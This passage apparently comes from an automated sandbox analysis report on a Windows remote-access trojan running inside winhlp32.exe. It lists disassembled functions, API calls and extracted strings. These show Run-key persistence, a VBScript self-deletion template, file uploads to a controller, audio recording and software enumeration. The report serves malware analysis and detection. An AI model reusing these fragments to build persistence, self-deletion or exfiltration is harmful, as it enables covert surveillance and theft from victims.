                                    • ShellExecuteW.SHELL32(00000000,open,00000000,00466468,00466468,00000000), ref: 0040D7C4
                                    • ExitProcess.KERNEL32 ref: 0040D7D0
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: File$Terminate$AttributesProcessThread$CreateDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                    • String ID: """, 0$")$0qF$0qF$8SG$CreateObject("WScript.Shell").Run "cmd /c ""$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$\update.vbs$dMG$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$wend$while fso.FileExists("
                                    • API String ID: 1861856835-332907002
                                    • Opcode ID: 4ed5f5d5e7ff342ec2a336c57b1c01b382e2bcaa191396cb8c86ed758bd95090
                                    • Instruction ID: f0dedf37b1d13a6a68a2ae87fd6fc042f686ba0b246118386f774540a9e6bc24
                                    • Opcode Fuzzy Hash: 4ed5f5d5e7ff342ec2a336c57b1c01b382e2bcaa191396cb8c86ed758bd95090
                                    • Instruction Fuzzy Hash: 2191A4716082005AC315FB62D8529AFB7A9AF91309F10443FB14AA71E3FF7C9D49C65E
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0040D096 Relevance: 42.3, APIs: 6, Strings: 18, Instructions: 260registryCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00412850: TerminateProcess.KERNEL32(00000000,?,0040D80F), ref: 00412860
                                      • Part of subcall function 00412850: WaitForSingleObject.KERNEL32(000000FF,?,0040D80F), ref: 00412873
                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D1A5
                                    • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040D1B8
                                    • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D1E8
                                    • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D1F7
                                      • Part of subcall function 0040B8AC: TerminateThread.KERNEL32(0040A27D,00000000,00000000,?,0040D442,?,00000000), ref: 0040B8BB
                                      • Part of subcall function 0040B8AC: UnhookWindowsHookEx.USER32(004750F0), ref: 0040B8C7
                                      • Part of subcall function 0040B8AC: TerminateThread.KERNEL32(0040A267,00000000,?,0040D442,?,00000000), ref: 0040B8D5
                                      • Part of subcall function 0041B978: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,0040407C), ref: 0041B99F
                                    • ShellExecuteW.SHELL32(00000000,open,00000000,00466468,00466468,00000000), ref: 0040D412
                                    • ExitProcess.KERNEL32 ref: 0040D419
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: FileProcessTerminate$AttributesThread$CurrentDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                    • String ID: ")$.vbs$8SG$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$dMG$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$hpF$open$pth_unenc$wend$while fso.FileExists("
                                    • API String ID: 3797177996-2557013105
                                    • Opcode ID: d286f588f5818cca07a6e4c27455efb45431ebdc6a01d8eb82299511fc22b521
                                    • Instruction ID: d7bb7cf55c4450259501d0c3086a2d123ad94ece798773e978a9ab54bd012bbb
                                    • Opcode Fuzzy Hash: d286f588f5818cca07a6e4c27455efb45431ebdc6a01d8eb82299511fc22b521
                                    • Instruction Fuzzy Hash: 9081B0716082005BC715FB62D8529AF77A8AFD1308F10483FB586A71E2EF7C9E49C65E
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00412475 Relevance: 40.4, APIs: 17, Strings: 6, Instructions: 190synchronizationsleepfileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CreateMutexA.KERNEL32(00000000,00000001,00000000,00000000,004750E4,00000003), ref: 00412494
                                    • ExitProcess.KERNEL32(00000000), ref: 004124A0
                                    • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 0041251A
                                    • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 00412529
                                    • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00412534
                                    • CloseHandle.KERNEL32(00000000), ref: 0041253B
                                    • GetCurrentProcessId.KERNEL32 ref: 00412541
                                    • PathFileExistsW.SHLWAPI(?), ref: 00412572
                                    • GetTempPathW.KERNEL32(00000104,?), ref: 004125D5
                                    • GetTempFileNameW.KERNEL32(?,temp_,00000000,?), ref: 004125EF
                                    • lstrcatW.KERNEL32(?,.exe), ref: 00412601
                                      • Part of subcall function 0041C3F1: CreateFileW.KERNEL32(00000004,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,?,00000004,00000000,0041C510,00000000,00000000,00000000), ref: 0041C430
                                    • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 00412641
                                    • Sleep.KERNEL32(000001F4), ref: 00412682
                                    • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 00412697
                                    • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004126A2
                                    • CloseHandle.KERNEL32(00000000), ref: 004126A9
                                    • GetCurrentProcessId.KERNEL32 ref: 004126AF
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Process$File$Create$CloseCurrentHandleObjectOpenPathSingleTempWait$ExecuteExistsExitMutexNameShellSleeplstrcat
                                    • String ID: .exe$8SG$WDH$exepath$open$temp_
                                    • API String ID: 2649220323-436679193
                                    • Opcode ID: 68a6d1683c491aa5f69a5158323edd29138381c8b32ecc661663b13424b24b94
                                    • Instruction ID: 17e21f0bcac096b9b94ced5306d028ab2385f4d1d2402c2ee3c492442eb82615
                                    • Opcode Fuzzy Hash: 68a6d1683c491aa5f69a5158323edd29138381c8b32ecc661663b13424b24b94
                                    • Instruction Fuzzy Hash: 4651B371A00315BBDB10ABA09C9AEFE336D9B04715F10406BF502E71D2EFBC8E85865D
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0041B047 Relevance: 40.4, APIs: 12, Strings: 11, Instructions: 180synchronizationCOMMON
                                    Download Yara Rule
                                    APIs
                                    • mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 0041B13C
                                    • mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 0041B150
                                    • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,004660A4), ref: 0041B178
                                    • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00474EE0,00000000), ref: 0041B18E
                                    • mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 0041B1CF
                                    • mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 0041B1E7
                                    • mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 0041B1FC
                                    • SetEvent.KERNEL32 ref: 0041B219
                                    • WaitForSingleObject.KERNEL32(000001F4), ref: 0041B22A
                                    • CloseHandle.KERNEL32 ref: 0041B23A
                                    • mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 0041B25C
                                    • mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 0041B266
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
                                    • String ID: alias audio$" type $close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped$NG
                                    • API String ID: 738084811-2094122233
                                    • Opcode ID: a32571104eb0df3ab7bb69bc80b77b3340521799c31937e3b9a7319bb649b0aa
                                    • Instruction ID: fe650b41180b39ed17604f18bcb9a712e211fca36760164052b554565c231c06
                                    • Opcode Fuzzy Hash: a32571104eb0df3ab7bb69bc80b77b3340521799c31937e3b9a7319bb649b0aa
                                    • Instruction Fuzzy Hash: 0351A3B12842056AD314B771DC96ABF379CDB84358F10043FB64A521E2EF788D48CA6E
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00401A6D Relevance: 35.2, APIs: 16, Strings: 4, Instructions: 156fileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AD9
                                    • WriteFile.KERNEL32(00000000,RIFF,00000004,?,00000000), ref: 00401B03
                                    • WriteFile.KERNEL32(00000000,00000000,00000004,00000000,00000000), ref: 00401B13
                                    • WriteFile.KERNEL32(00000000,WAVE,00000004,00000000,00000000), ref: 00401B23
                                    • WriteFile.KERNEL32(00000000,fmt ,00000004,00000000,00000000), ref: 00401B33
                                    • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401B43
                                    • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B54
                                    • WriteFile.KERNEL32(00000000,00472AAA,00000002,00000000,00000000), ref: 00401B65
                                    • WriteFile.KERNEL32(00000000,00472AAC,00000004,00000000,00000000), ref: 00401B75
                                    • WriteFile.KERNEL32(00000000,00000001,00000004,00000000,00000000), ref: 00401B85
                                    • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B96
                                    • WriteFile.KERNEL32(00000000,00472AB6,00000002,00000000,00000000), ref: 00401BA7
                                    • WriteFile.KERNEL32(00000000,data,00000004,00000000,00000000), ref: 00401BB7
                                    • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401BC7
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: File$Write$Create
                                    • String ID: RIFF$WAVE$data$fmt
                                    • API String ID: 1602526932-4212202414
                                    • Opcode ID: 62b265300192e2cf3fc36ee1b19606fb2409bb2919511e1e0316a81c88f5e1bc
                                    • Instruction ID: 2ec91bc18be8700290cedec85ec8f66933089e8d2246bcc6fed4c3761e19f715
                                    • Opcode Fuzzy Hash: 62b265300192e2cf3fc36ee1b19606fb2409bb2919511e1e0316a81c88f5e1bc
                                    • Instruction Fuzzy Hash: EB414E72644308BAE210DA51DD86FBB7EECEB89B50F40441AF644D60C0D7A4E909DBB3
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00407270 Relevance: 35.1, APIs: 12, Strings: 8, Instructions: 62libraryloaderCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetModuleHandleW.KERNEL32(ntdll.dll,RtlInitUnicodeString,00000000,C:\Windows\winhlp32.exe,00000001,0040764D,C:\Windows\winhlp32.exe,00000003,00407675,004752D8,004076CE), ref: 00407284
                                    • GetProcAddress.KERNEL32(00000000), ref: 0040728D
                                    • GetModuleHandleW.KERNEL32(ntdll.dll,NtAllocateVirtualMemory), ref: 004072A2
                                    • GetProcAddress.KERNEL32(00000000), ref: 004072A5
                                    • GetModuleHandleW.KERNEL32(ntdll.dll,NtFreeVirtualMemory), ref: 004072B6
                                    • GetProcAddress.KERNEL32(00000000), ref: 004072B9
                                    • GetModuleHandleW.KERNEL32(ntdll.dll,RtlAcquirePebLock), ref: 004072CA
                                    • GetProcAddress.KERNEL32(00000000), ref: 004072CD
                                    • GetModuleHandleW.KERNEL32(ntdll.dll,RtlReleasePebLock), ref: 004072DE
                                    • GetProcAddress.KERNEL32(00000000), ref: 004072E1
                                    • GetModuleHandleW.KERNEL32(ntdll.dll,LdrEnumerateLoadedModules), ref: 004072F2
                                    • GetProcAddress.KERNEL32(00000000), ref: 004072F5
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AddressHandleModuleProc
                                    • String ID: C:\Windows\winhlp32.exe$LdrEnumerateLoadedModules$NtAllocateVirtualMemory$NtFreeVirtualMemory$RtlAcquirePebLock$RtlInitUnicodeString$RtlReleasePebLock$ntdll.dll
                                    • API String ID: 1646373207-2557295206
                                    • Opcode ID: 219bb9ae8fbeca959e8a3246f6ba2b5d667704a520b136de0cc32d122fe89174
                                    • Instruction ID: f839149ce94c73eee9bda0254407c114f4740b95dc73f4bc012c28e2a4ae17e7
                                    • Opcode Fuzzy Hash: 219bb9ae8fbeca959e8a3246f6ba2b5d667704a520b136de0cc32d122fe89174
                                    • Instruction Fuzzy Hash: 520171E0E4431676DB216F3A6C54D4B6F9C9E5125131A087BB409E2292FEBCE800CE6D
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0041C01B Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 139stringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • lstrlenW.KERNEL32(?), ref: 0041C036
                                    • _memcmp.LIBVCRUNTIME ref: 0041C04E
                                    • lstrlenW.KERNEL32(?), ref: 0041C067
                                    • FindFirstVolumeW.KERNEL32(?,00000104,?), ref: 0041C0A2
                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 0041C0B5
                                    • QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 0041C0F9
                                    • lstrcmpW.KERNEL32(?,?), ref: 0041C114
                                    • FindNextVolumeW.KERNEL32(?,0000003F,00000104), ref: 0041C12C
                                    • _wcslen.LIBCMT ref: 0041C13B
                                    • FindVolumeClose.KERNEL32(?), ref: 0041C15B
                                    • GetLastError.KERNEL32 ref: 0041C173
                                    • GetVolumePathNamesForVolumeNameW.KERNEL32(?,?,?,?), ref: 0041C1A0
                                    • lstrcatW.KERNEL32(?,?), ref: 0041C1B9
                                    • lstrcpyW.KERNEL32(?,?), ref: 0041C1C8
                                    • GetLastError.KERNEL32 ref: 0041C1D0
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Volume$ErrorFindLast$lstrlen$CloseDeviceFirstNameNamesNextPathQuery_memcmp_wcslenlstrcatlstrcmplstrcpy
                                    • String ID: ?
                                    • API String ID: 3941738427-1684325040
                                    • Opcode ID: abe7e308a1a6702f98718e9be80ca678ae2d2d31c1c14d85f2c6eaae61ca29ed
                                    • Instruction ID: a349862c8cee18361e8dc915c9858c0b302c9409c899df8dda18ff866c7f94c5
                                    • Opcode Fuzzy Hash: abe7e308a1a6702f98718e9be80ca678ae2d2d31c1c14d85f2c6eaae61ca29ed
                                    • Instruction Fuzzy Hash: 8B416171584316EBD720DFA0DC889EB77ECAB49755F00092BF545C2261EB78C988CBDA
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0044F42D Relevance: 25.9, APIs: 17, Instructions: 419COMMON
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: _free$EnvironmentVariable$_wcschr
                                    • String ID:
                                    • API String ID: 3899193279-0
                                    • Opcode ID: 8c398c17f7198d8e95fa4204fbdfe0aa09a5082618e125736fc7a2c78f972757
                                    • Instruction ID: f75d98bba309171a1893162bbba9979c566f834f65d54a181aa040c21db392b6
                                    • Opcode Fuzzy Hash: 8c398c17f7198d8e95fa4204fbdfe0aa09a5082618e125736fc7a2c78f972757
                                    • Instruction Fuzzy Hash: C4D13672D007006BFB20AF799D81A6B77A4EF01318F05427FE919A7382EB3D99058799
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00412AB4 Relevance: 25.0, APIs: 9, Strings: 5, Instructions: 482sleepfileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00412ACD
                                      • Part of subcall function 0041B978: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,0040407C), ref: 0041B99F
                                      • Part of subcall function 00418568: CloseHandle.KERNEL32(004040F5,?,?,004040F5,00465E74), ref: 0041857E
                                      • Part of subcall function 00418568: CloseHandle.KERNEL32(t^F,?,?,004040F5,00465E74), ref: 00418587
                                    • Sleep.KERNEL32(0000000A,00465E74), ref: 00412C1F
                                    • Sleep.KERNEL32(0000000A,00465E74,00465E74), ref: 00412CC1
                                    • Sleep.KERNEL32(0000000A,00465E74,00465E74,00465E74), ref: 00412D63
                                    • DeleteFileW.KERNEL32(00000000,00465E74,00465E74,00465E74), ref: 00412DC5
                                    • DeleteFileW.KERNEL32(00000000,00465E74,00465E74,00465E74), ref: 00412DFC
                                    • DeleteFileW.KERNEL32(00000000,00465E74,00465E74,00465E74), ref: 00412E38
                                    • Sleep.KERNEL32(000001F4,00465E74,00465E74,00465E74), ref: 00412E52
                                    • Sleep.KERNEL32(00000064), ref: 00412E94
                                      • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Sleep$File$Delete$CloseHandle$CurrentModuleNameProcesssend
                                    • String ID: /stext "$0TG$0TG$NG$NG
                                    • API String ID: 1223786279-2576077980
                                    • Opcode ID: 32d90d55cb05bb5b069b036a4d337625a659ecb65ee468f1972c10dd974b4365
                                    • Instruction ID: 3b0169c2c8bc9f0d695cedb60fdc7b81a1931596247e975dd6f1dc47d42db627
                                    • Opcode Fuzzy Hash: 32d90d55cb05bb5b069b036a4d337625a659ecb65ee468f1972c10dd974b4365
                                    • Instruction Fuzzy Hash: 990255311083418AC325FB62D851AEFB3E5AFD4348F50483EF58A971E2EF785A49C65A
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0041C68F Relevance: 23.0, APIs: 6, Strings: 7, Instructions: 214registryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?), ref: 0041C6B1
                                    • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 0041C6F5
                                    • RegCloseKey.ADVAPI32(?), ref: 0041C9BF
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CloseEnumOpen
                                    • String ID: DisplayName$DisplayVersion$InstallDate$InstallLocation$Publisher$Software\Microsoft\Windows\CurrentVersion\Uninstall$UninstallString
                                    • API String ID: 1332880857-3714951968
                                    • Opcode ID: 131f557390299a5fb98f0b65c13fdfd9cb57ca643134b75c275777f897c8710a
                                    • Instruction ID: af0903b0dab8fbea49832074ad132f154b97281cd99b968e1e8b6bf9777b958e
                                    • Opcode Fuzzy Hash: 131f557390299a5fb98f0b65c13fdfd9cb57ca643134b75c275777f897c8710a
                                    • Instruction Fuzzy Hash: 248144711083419BC325EF11D851EEFB7E8BF94309F10492FB589921A1FF78AE49CA5A
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0041D58F Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 74windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • DefWindowProcA.USER32(?,00000401,?,?), ref: 0041D5DA
                                    • GetCursorPos.USER32(?), ref: 0041D5E9
                                    • SetForegroundWindow.USER32(?), ref: 0041D5F2
                                    • TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 0041D60C
                                    • Shell_NotifyIconA.SHELL32(00000002,00474B48), ref: 0041D65D
                                    • ExitProcess.KERNEL32 ref: 0041D665
                                    • CreatePopupMenu.USER32 ref: 0041D66B
                                    • AppendMenuA.USER32(00000000,00000000,00000000,Close), ref: 0041D680
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
                                    • String ID: Close
                                    • API String ID: 1657328048-3535843008
                                    • Opcode ID: dc0ab9a0fe4ab677523636461039160516679b910eee6fe46bba41fdb84f3345
                                    • Instruction ID: 483e3be36cf21f9f431d69439bfbb75804d706e25d1e382f075e68ac53faeb55
                                    • Opcode Fuzzy Hash: dc0ab9a0fe4ab677523636461039160516679b910eee6fe46bba41fdb84f3345
                                    • Instruction Fuzzy Hash: 392127B1944208FFDB194FA4ED0EAAA3B65FB08342F000135FA0A950B1D775EDA1EB5D
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00408B7A Relevance: 21.3, APIs: 8, Strings: 4, Instructions: 328fileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,000000B6), ref: 00408CE3
                                    • GetFileSizeEx.KERNEL32(00000000,?), ref: 00408D1B
                                    • __aulldiv.LIBCMT ref: 00408D4D
                                      • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                      • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                    • SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000), ref: 00408E70
                                    • ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00408E8B
                                    • CloseHandle.KERNEL32(00000000), ref: 00408F64
                                    • CloseHandle.KERNEL32(00000000,00000052), ref: 00408FAE
                                    • CloseHandle.KERNEL32(00000000), ref: 00408FFC
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: File$CloseHandle$CreateLocalPointerReadSizeTime__aulldivsend
                                    • String ID: ReadFile error$SetFilePointerEx error$Uploading file to Controller: $NG
                                    • API String ID: 3086580692-2582957567
                                    • Opcode ID: 63a76c325e571f1cbcae1b5be894793c9b49cb204c16b04160e7bd094f2be9c7
                                    • Instruction ID: 4fd1ef8f0950b8c70c5ee12d710945c0a569e6ad21e20d2a74dcf75f3ec9a52d
                                    • Opcode Fuzzy Hash: 63a76c325e571f1cbcae1b5be894793c9b49cb204c16b04160e7bd094f2be9c7
                                    • Instruction Fuzzy Hash: 95B193716083409BC314FB25C982AAFB7E5AFC4354F50492FF589622D2EF789945CB8B
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0040A726 Relevance: 21.2, APIs: 6, Strings: 6, Instructions: 163sleepCOMMON
                                    Download Yara Rule
                                    APIs
                                    • Sleep.KERNEL32(00001388), ref: 0040A740
                                      • Part of subcall function 0040A675: CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,0040A74D), ref: 0040A6AB
                                      • Part of subcall function 0040A675: GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040A74D), ref: 0040A6BA
                                      • Part of subcall function 0040A675: Sleep.KERNEL32(00002710,?,?,?,0040A74D), ref: 0040A6E7
                                      • Part of subcall function 0040A675: CloseHandle.KERNEL32(00000000,?,?,?,0040A74D), ref: 0040A6EE
                                    • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 0040A77C
                                    • GetFileAttributesW.KERNEL32(00000000), ref: 0040A78D
                                    • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 0040A7A4
                                    • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00000012), ref: 0040A81E
                                      • Part of subcall function 0041C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,0040412F,00465E74), ref: 0041C49E
                                    • SetFileAttributesW.KERNEL32(00000000,00000006,00000013,00466468,00000000,00000000,00000000), ref: 0040A927
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: File$AttributesCreate$Sleep$CloseDirectoryExistsHandlePathSize
                                    • String ID: 8SG$8SG$pQG$pQG$PG$PG
                                    • API String ID: 3795512280-1152054767
                                    • Opcode ID: f9bf0f70ca639f6d962135a3ade2805c3c6b71e3802994e37fdf4666e5df7246
                                    • Instruction ID: 265ddfea45d140738b9a7e0f0353a6f5be26653907181caffe3561bb72ed66c0
                                    • Opcode Fuzzy Hash: f9bf0f70ca639f6d962135a3ade2805c3c6b71e3802994e37fdf4666e5df7246
                                    • Instruction Fuzzy Hash: A7517E716043055ACB09BB32C866ABE739A9F80349F00483FB642B71E2DF7C9D09865E
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 004048C8 Relevance: 21.1, APIs: 4, Strings: 8, Instructions: 144networkCOMMON
                                    Download Yara Rule
                                    APIs
                                    • connect.WS2_32(?,?,?), ref: 004048E0
                                    • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404A00
                                    • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404A0E
                                    • WSAGetLastError.WS2_32 ref: 00404A21
                                      • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CreateEvent$ErrorLastLocalTimeconnect
                                    • String ID: Connection Failed: $Connection Refused$PkGNG$TLS Authentication Failed$TLS Error 1$TLS Error 2$TLS Error 3$TLS Handshake... |
                                    • API String ID: 994465650-3229884001
                                    • Opcode ID: 544a8dfd755885537e58458bfc18e92728dddd0fb449b18b6c8fe8c32441fe06
                                    • Instruction ID: c5d57dbf39bf42eeb7f1fe8451fa1a1ddda5cb55b73798f96fdafd5064c5310c
                                    • Opcode Fuzzy Hash: 544a8dfd755885537e58458bfc18e92728dddd0fb449b18b6c8fe8c32441fe06
                                    • Instruction Fuzzy Hash: 3E41E8B47406016BD61877BA8D1B53E7A15AB81304B50017FE60267AD3EB7D9C108BDF
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 004512C6 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • ___free_lconv_mon.LIBCMT ref: 0045130A
                                      • Part of subcall function 00450502: _free.LIBCMT ref: 0045051F
                                      • Part of subcall function 00450502: _free.LIBCMT ref: 00450531
                                      • Part of subcall function 00450502: _free.LIBCMT ref: 00450543
                                      • Part of subcall function 00450502: _free.LIBCMT ref: 00450555
                                      • Part of subcall function 00450502: _free.LIBCMT ref: 00450567
                                      • Part of subcall function 00450502: _free.LIBCMT ref: 00450579
                                      • Part of subcall function 00450502: _free.LIBCMT ref: 0045058B
                                      • Part of subcall function 00450502: _free.LIBCMT ref: 0045059D
                                      • Part of subcall function 00450502: _free.LIBCMT ref: 004505AF
                                      • Part of subcall function 00450502: _free.LIBCMT ref: 004505C1
                                      • Part of subcall function 00450502: _free.LIBCMT ref: 004505D3
